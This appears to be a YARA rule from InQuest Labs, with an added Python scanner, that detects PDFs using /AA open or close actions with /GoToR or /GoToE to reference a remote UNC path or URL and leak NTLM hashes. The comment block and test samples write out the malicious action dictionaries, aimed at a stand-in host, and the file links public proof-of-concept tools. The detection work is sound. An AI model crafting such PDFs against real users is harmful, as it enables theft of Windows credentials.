NTLM_Credentials_Theft_via_PDF_Files.rule
/*
This signature detects Adobe PDF files that reference a remote UNC object for the purpose of leaking NTLM hashes.
New methods for NTLM hash leaks are discovered from time to time. This particular one is triggered upon opening of a
maliciously crafted PDF. Original write-up from CheckPoint:
https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
Public proof-of-concepts:
https://github.com/deepzec/Bad-Pdf
https://github.com/3gstudent/Worse-PDF

Requirements (all of the following must be present inside one action dictionary):
    /AA     Auto Action dictionary that holds the trigger.
    /O      open trigger; functionally equivalent to /C (close) for this purpose.
    /S      action type: /GoToE (embedded) can be swapped with /GoToR (remote).
    /D      destination (location) reference.
    /F      file specification carrying the UNC reference.

Multiple different arrangements of /D, /S and /F are possible. Example one:
    /AA <<
        /O <<
            /F (\\\\10.20.30.40\\test)
            /D [ 0 /Fit]
            /S /GoToR
        >>
Example two:
    /AA <<
        /C <<
            /D [ 0 /Fit]
            /S /GoToE
            /F (\\\\10.20.30.40\\test)
        >>
Example three:
    /AA <<
        /O <<
            /D [ 0 /Fit]
            /F (\\\\10.20.30.40\\test)
            /S /GoToR
        >>

Multiple protocols are supported for the /F reference, including both HTTP and UNC.
*/
rule NTLM_Credential_Theft_via_PDF
{
    meta:
        Author      = "InQuest Labs"
        URL         = "https://github.com/InQuest/yara-rules"
        Description = "This signature detects Adobe PDF files that reference a remote UNC object for the purpose of leaking NTLM hashes."

    strings:
        // we have three regexes here so that we catch all possible orderings but still meet the requirement of all three parts.
        // each pattern requires /AA, an /O or /C trigger, a /D destination, /S /GoToE or /GoToR, and an /F that points at
        // either a UNC path (four then two backslashes in the raw file, because PDF string syntax escapes each backslash)
        // or an http(s) URL. /D is matched literally as \/D (the earlier \/\D was the regex class "any non-digit" and
        // would also have accepted unrelated keys).

        // ordering 1: /D and /S (either way round), then /F
        $badness1 = /\s*\/AA\s*<<\s*\/[OC]\s*<<((\s*\/D\s*\[[^\]]+\])(\s*\/S\s*\/GoTo[ER])|(\s*\/S\s*\/GoTo[ER])(\s*\/D\s*\[[^\]]+\]))\s*\/F\s*\((\\\\\\\\[a-z0-9]+\.[^\\]+\\\\[a-z0-9]+|https?:\/\/[^\)]+)\)/ nocase

        // ordering 2: /F first, then /D and /S (either way round)
        $badness2 = /\s*\/AA\s*<<\s*\/[OC]\s*<<\s*\/F\s*\((\\\\\\\\[a-z0-9]+\.[^\\]+\\\\[a-z0-9]+|https?:\/\/[^\)]+)\)((\s*\/D\s*\[[^\]]+\])(\s*\/S\s*\/GoTo[ER])|(\s*\/S\s*\/GoTo[ER])(\s*\/D\s*\[[^\]]+\]))/ nocase

        // ordering 3: /F between /D and /S (either way round); both branches accept the same UNC-or-URL targets as above
        $badness3 = /\s*\/AA\s*<<\s*\/[OC]\s*<<((\s*\/D\s*\[[^\]]+\])\s*\/F\s*\((\\\\\\\\[a-z0-9]+\.[^\\]+\\\\[a-z0-9]+|https?:\/\/[^\)]+)\)(\s*\/S\s*\/GoTo[ER])|(\s*\/S\s*\/GoTo[ER])\s*\/F\s*\((\\\\\\\\[a-z0-9]+\.[^\\]+\\\\[a-z0-9]+|https?:\/\/[^\)]+)\)(\s*\/D\s*\[[^\]]+\]))/ nocase

    condition:
        // the %PDF magic (0x25504446) must start within the first 1024 bytes, and any one of the three orderings must match
        for any i in (0..1024) : (uint32be(i) == 0x25504446) and any of ($badness*)
}
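As an added illustration (not InQuest's code and not part of the rule file), a small Python scanner that applies the same logic as the rule to raw PDF bytes and reports what it matched: the %PDF magic within the first 1024 bytes, an /AA dictionary with an /O or /C trigger, and /D, /S /GoTo[ER] and /F in any order where /F names a UNC path or http(s) URL. The PDF fragments and the 10.20.30.40 host are constructed test data modelled on the three examples in the comment; the function and sample names are this example's own.

```python
import re

# Added example (not InQuest's code): a Python scanner that applies the same
# logic as the YARA rule to raw PDF bytes and reports what it found.
# Inner /AA action dictionary with an /O (open) or /C (close) trigger.
AA_ACTION = re.compile(rb"/AA\s*<<\s*/([OC])\s*<<(.*?)>>", re.I | re.S)
KEY_D = re.compile(rb"/D\s*\[[^\]]*\]", re.I)      # destination
KEY_S = re.compile(rb"/S\s*/GoTo([ER])", re.I)    # embedded or remote go-to
KEY_F = re.compile(rb"/F\s*\(([^)]*)\)", re.I)    # file specification
# Same target shapes as the rule: a PDF-escaped UNC path (\\\\host\\share in the
# raw file, i.e. four then two literal backslashes) or an http(s) URL.
REMOTE = re.compile(rb"^(\\\\\\\\[a-z0-9]+\.[^\\]+\\\\[a-z0-9]+|https?://[^)]+)$", re.I)


def scan_pdf(data: bytes) -> list[dict]:
    """Return one finding per /AA action whose /F points at a remote target.

    Like the rule's condition, the %PDF magic must start within the first
    1024 bytes; /D, /S and /F may appear in any order inside the action."""
    if data.find(b"%PDF", 0, 1028) == -1:
        return []
    findings = []
    for m in AA_ACTION.finditer(data):
        trigger, body = m.group(1).decode().upper(), m.group(2)
        f, s = KEY_F.search(body), KEY_S.search(body)
        if not (f and s and KEY_D.search(body)):
            continue  # all three entries are required, as in the rule
        target = f.group(1)
        if REMOTE.match(target):
            findings.append({
                "offset": m.start(),
                "trigger": "open" if trigger == "O" else "close",
                "action": "GoTo" + s.group(1).decode().upper(),
                "target": target.decode(errors="replace"),
            })
    return findings


def _sample(action: bytes) -> bytes:
    """Wrap a constructed /AA action in a minimal PDF skeleton (test data only)."""
    return b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /AA << " + action + b" >> >>\nendobj\n%%EOF\n"


# Constructed fragments following the three orderings from the rule's comment.
SAMPLE_OPEN_UNC = _sample(b"/O << /F (\\\\\\\\10.20.30.40\\\\test) /D [ 0 /Fit] /S /GoToR >>")
SAMPLE_CLOSE_EMBEDDED = _sample(b"/C << /D [ 0 /Fit] /S /GoToE /F (\\\\\\\\10.20.30.40\\\\test) >>")
SAMPLE_OPEN_HTTP = _sample(b"/O << /D [ 0 /Fit] /F (http://10.20.30.40/test) /S /GoToR >>")
SAMPLE_LOCAL_ONLY = _sample(b"/O << /D [ 0 /Fit] /F (attachment.pdf) /S /GoToE >>")  # benign local file
```

Running `scan_pdf` over the first three samples yields one finding each (open/GoToR, close/GoToE, open/GoToR with the HTTP target), while the local-file sample and any input whose %PDF magic lies past the first 1024 bytes yield none.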